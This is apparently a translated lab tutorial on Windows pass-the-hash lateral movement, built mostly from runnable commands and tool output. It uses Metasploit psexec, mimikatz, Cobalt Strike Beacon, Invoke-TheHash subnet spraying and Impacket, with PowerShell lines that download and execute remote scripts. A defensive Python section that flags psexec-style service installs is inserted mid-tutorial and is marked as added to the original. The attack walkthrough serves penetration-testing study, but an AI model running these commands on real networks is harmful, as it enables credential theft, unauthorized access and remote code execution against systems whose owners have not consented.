PTH overview

Pass the Hash, also called a hash-passing attack, is abbreviated PTH. It simulates a user logon without the user's plaintext password: the captured hash is used directly to authenticate to the target system.
Prerequisites for a successful attack:

- port 445 (the SMB service) is open
- the admin$ share is enabled
Obtaining hashes

Run hashdump in the Meterpreter session you already have to obtain the users' hash values:

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
The Metasploit PTH module that yields a Meterpreter session directly on execution is exploit/windows/smb/psexec.
Workgroup

```
sessions 1
run autoroute -s 10.10.10.1/24
run autoroute -p
```
In the internal network a bind (forward) shell payload is used, which yields a shell session on the internal target host:

```
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.20
msf6 exploit(windows/smb/psexec) > set smbuser administrator
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set lport 51234
msf6 exploit(windows/smb/psexec) > run
```
Domain environment

NTLM hash of the domain user lisi:

```
e318a05a844086852b42d47e60ee2b1c
```

```
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 10.10.10.10
msf5 exploit(windows/smb/psexec) > set smbdomain kc.local
msf5 exploit(windows/smb/psexec) > set smbuser lisi
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e318a05a844086852b42d47e60ee2b1c
msf5 exploit(windows/smb/psexec) > run
```
Mimikatz pass-the-hash attack

Once we have the NTLM hash of a host in the internal network, we can use mimikatz to perform a pass-the-hash attack against that host; when the command succeeds, a cmd window is spawned:

```
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.20 /ntlm:45a524862326cb9e7d85af4017a000f0" exit
```
In the spawned cmd we can connect to the host directly, list its directories and files, and so on:

```
net use \\10.10.10.20\c$
dir \\10.10.10.20\c$
copy 1.exe \\10.10.10.20\c$
net use h: \\10.10.10.20\c$
```
CobaltStrike pass-the-hash attack

Obtaining hashes

Once a Beacon session is obtained, run commands such as hashdump or logonpasswords to get the user hashes of the current host.
Workgroup

The operations above actually run the following commands in the selected Beacon session:

```
rev2self
# restore the original token
pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
# perform PTH through mimikatz, i.e.:
# mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960"
jump psexec WEB 42585
# generate the payload for windows/beacon_bind_tcp (0.0.0.0:42585) (\\WEB\ADMIN$\403121c.exe) and upload it to the WEB host
# create and start service 403121c on WEB through the Service Control Manager to run the payload
```

```
[01/30 01:38:21] beacon> rev2self
[01/30 01:38:21] [*] Tasked beacon to revert token
[01/30 01:38:21] beacon> pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
[01/30 01:38:21] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960" command
[01/30 01:38:21] beacon> jump psexec WEB 42585
[01/30 01:38:21] [*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:42585) on WEB via Service Control Manager (\\WEB\ADMIN$\403121c.exe)
[01/30 01:38:23] [+] host called home, sent: 591778 bytes
[01/30 01:38:28] [+] Impersonated PC\Administrator
[01/30 01:38:28] [+] received output:
Started service 403121c on WEB
[01/30 01:38:28] [+] established link to child beacon: 10.10.10.20
[01/30 01:38:28] [+] received output:
user    : Administrator
domain  : PC
program : C:\Windows\system32\cmd.exe /c echo 55d23cd5b3e > \\.\pipe\2f6960
impers. : no
NTLM    : 45a524862326cb9e7d85af4017a000f0
  |  PID  1824
  |  TID  4024
  |  LSA Process is now R/W
  |  LUID 0 ; 55498536 (00000000:034ed728)
  \_ msv1_0   - data copy @ 00000000018EFED0 : OK !
  \_ kerberos -
```
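The Beacon log above shows what psexec-style lateral movement (Cobalt Strike's jump psexec, and likewise Metasploit's exploit/windows/smb/psexec) leaves on the target: a service with a random hex name, created through the Service Control Manager, whose binary sits on ADMIN$. As an added defensive example that is not part of the original post, the Python below scores service-install records against those traits; the records and their field names are constructed assumptions modelled on Windows System event 7045 ("A service was installed in the system").

```python
import re

# Constructed sample records modelled on Windows System log event 7045
# ("A service was installed in the system"); the field names are assumptions.
# The first record mirrors the Cobalt Strike jump psexec output shown above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WEB", "ServiceName": "403121c",
     "ImagePath": r"\\WEB\ADMIN$\403121c.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WEB", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "DC01", "ServiceName": "svcupd",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami > \\127.0.0.1\C$\__out 2>&1",
     "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "WEB", "ServiceName": "Spooler",
     "ImagePath": "", "AccountName": ""},
]

RANDOM_HEX_NAME = re.compile(r"^[0-9a-f]{7,8}$")                    # e.g. 403121c
ADMIN_SHARE_PATH = re.compile(r"^\\\\[^\\]+\\(ADMIN|C)\$\\", re.I)  # \\HOST\ADMIN$\...
CMD_LAUNCHER = re.compile(r"%COMSPEC%|\bcmd(\.exe)?\b", re.I)       # cmd one-liner as image

def score_service_install(event):
    """Return the heuristics a service-install record trips; [] means nothing flagged."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    name, path = event.get("ServiceName", ""), event.get("ImagePath", "")
    if RANDOM_HEX_NAME.match(name):
        reasons.append("random-looking hex service name")
    if ADMIN_SHARE_PATH.match(path):
        reasons.append("binary staged on an administrative share")
    if CMD_LAUNCHER.search(path):
        reasons.append("service image is a command interpreter one-liner")
    return reasons

def find_suspicious(events):
    """Map (Computer, ServiceName) -> reasons for every record that trips a heuristic."""
    hits = {}
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            hits[(ev["Computer"], ev["ServiceName"])] = reasons
    return hits

if __name__ == "__main__":
    for key, why in find_suspicious(SAMPLE_EVENTS).items():
        print(key, "->", "; ".join(why))
```

Correlating a flagged 7045 with a preceding network logon (NTLM, logon type 3) from the same source host narrows the results further; a 7036 start/stop record by itself is not flagged.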
Domain environment
We obtained the NTLM hash of the user lisi in the kc domain and found that it is a domain administrator account.

Running net view locates the DC's IP address: 10.10.10.10.
PowerShell pass-the-hash attack

Use a known administrator hash to spray a specified subnet of machines in bulk; this method works in both workgroup and domain environments.
Both Invoke-WMIExec.ps1 and Invoke-TheHash.ps1 must be loaded: https://github.com/Kevin-Robertson/Invoke-TheHash
```
powershell -exec bypass
Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1
```

```
powershell -exec bypass
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');
```
```
Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash 579110c49145015c47ecd267657d3174
```

```
Workgroup:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4

Domain:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 10.10.10.0/24 -Domain kc -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
```
Impacket pass-the-hash attack

```
Command execution:
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20 "whoami"

Get a shell:
smbexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20
```